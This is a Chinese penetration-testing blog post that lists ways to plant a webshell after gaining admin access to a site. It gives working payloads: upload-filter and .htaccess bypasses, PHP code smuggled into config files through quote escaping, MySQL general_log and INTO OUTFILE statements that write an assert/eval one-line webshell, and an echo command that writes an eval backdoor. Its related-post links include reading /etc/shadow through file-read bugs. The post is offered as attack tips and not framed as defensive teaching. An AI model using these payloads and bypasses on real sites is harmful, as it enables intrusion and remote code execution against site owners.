当前位置:首页 > 网络安全 > web渗透 > 正文内容

后台getshell常用技巧总结

5个月前 (01-16)1450

1.利用文件上传漏洞,找文件上传处想办法上传php文件。

一些网站在设置可以允许修改上传的文件类型则直接添加php

有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过

很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况

这种情况直接上传一个.hatccess文件覆盖这个,让其失效。

或者上传不重命名的话上传../../shell.php 传到其他不被限制访问的目录

或者找任意文件删除漏洞把.hatccess文件删除


2.找文件配置的地方写入php代码,一般都有过滤的,想办法绕过

过滤单引号的话可以用注释把上一个的内容注释掉 在下一个参数配置注入代码

效果如下:
$conf_1 ='xx\';
$conf_2 = ';phpinfo();//'

这样就相当于:
$conf_1 ='xx\';$conf_2 = ';
phpinfo();

php代码就可以执行了,防护比较弱的话直接访问这个配置文件就可以getshell了。

防护比较好禁止访问配置文件时,就找包含这个配置文件的文件即可。


3.找有没有存在任意文件包含的地方

本地包含的话直接上传php代码的图片,远程包含的话就在自己的服务器上设置php代码文件


4.sql注入getshell 要知道网站的绝对路径

方法一:利用设置mysql log为php文件,并设置路径到网站目录下,这样就可以把sql中执行的php语句插入的log中了

如:
SETglobal general_log='on';
SETglobalgeneral_log_file='D:/webshell/WWW/shell.php';#如果没有shell.php

会自动创建:

SELECT'<?php assert($_POST["cmd"]);?>';

方法二:
select "<?php phpinfo(); ?>" into outfile 'shell路径.php'


5.远程图片文件下载

有时候远程图片下载的时候,可以设置一下下载自己的php文件

如自己服务器上的文件1.php :

<?php
echo "<?php phpinfo(); ?>";
?>

或者别的方式,让页面有php代码,如果不过滤后缀的话直接会下载这个php文件


6.zip解压getshell

这个再系统升级或者插件安装的地方很多都有这个问题。上传shell.php在压缩包中,上传系统升级时会解压缩,那么就可以getshell


7.缓存写入

有些地方会把缓存写入到一个php文件里,想办法让自己的payload写入缓存中


8.数据库备份getshell

有些提供功能可以通过数据库备份进行修改文件后缀。


9.编辑模板getshell

在网站编辑模板插入一句话


10.命令执行拿webshell

echo <?php @eval($_POST(a));?> >路径.php

可以用相对路径也可以用绝对路径


11.编辑器漏洞getshell

要留意cms使用的编辑器版本是否是已知漏洞的版本


12.利用文件解析漏洞拿webshell


13.找可以执行代码的函数,看看参数是否可控


14.找写文件的函数,看看文件后缀和内容是否可控


15.没有进入后台

0day拿webshell

IIS写权限拿webshell(put一个shell进去)

命令执行拿webshell

通过注入漏洞拿webshell

前台图片上传拿webshell

Strusts2拿webshell

java反序列拿shell


扫描二维码推送至手机访问。

版权声明:本文由零零博客发布,如需转载请注明出处。

分享给朋友:

相关文章

漏洞挖掘 | 记一次越权登录

漏洞挖掘 | 记一次越权登录

http://xxxxx/index.html?userNo=xxxx可以直接登录学生用户(女朋友给的)fofa收集了一波4个站点。。。,由于没扫到备份,只能黑盒测了然后发现一处接口 杂七杂八测试了下...

web缓存欺骗和web缓存投毒攻击方式

web缓存欺骗和web缓存投毒攻击方式

 首先我们先来了解一下什么是缓存,缓存在什么地方关于缓存由于现在网站应用的复杂性,通常一个首页就会进行大量资源的加载,为了使用户更快的加载网页,几乎都会使用缓存,即将一些常用的静态文件,存储...

新手怎么学习web渗透

新手怎么学习web渗透

因为web安全这一块范围实在太大,哪些先学,哪些后学,如果没有系统的路线会降低大家效率,对于刚入门的同学们来说简直就是“噩梦”。所以,这篇类似学习路线的文章,希望可以帮助刚入门的萌新们少走弯路。1,H...

网络渗透方向怎么学呢?

网络渗透方向怎么学呢?

很多朋友问我,想搞网络安全,编程重要吗,选什么语言呢?国内其实正经开设网络安全专业的学校很少,大部分同学是来自计算机科学、网络工程、软件工程专业的,甚至很多非计算机专业自学的。因此不像这三个专业,有系...

手机短信验证码渗透测试实战

手机短信验证码渗透测试实战

验证码绕过一般情况网站或者其它的业务系统在找回密码时都会通过手机号或者邮箱来验证用户身份。但是可悲的是他们在验证的过程中产生了一些逻辑错误。什么错误呢?大概是这样的,用户输入手机号,点击获取验证码,服...

文件读取漏洞总结

文件读取漏洞总结

1、一般我拿到一个任意文件读取得先判断权限大不大,如果权限够大的话可以直接先把/etc/sadow读下来,权限不够就读/etc/passwd,先把用户确定下来,方便后续操作2、读取各个用户的.bash...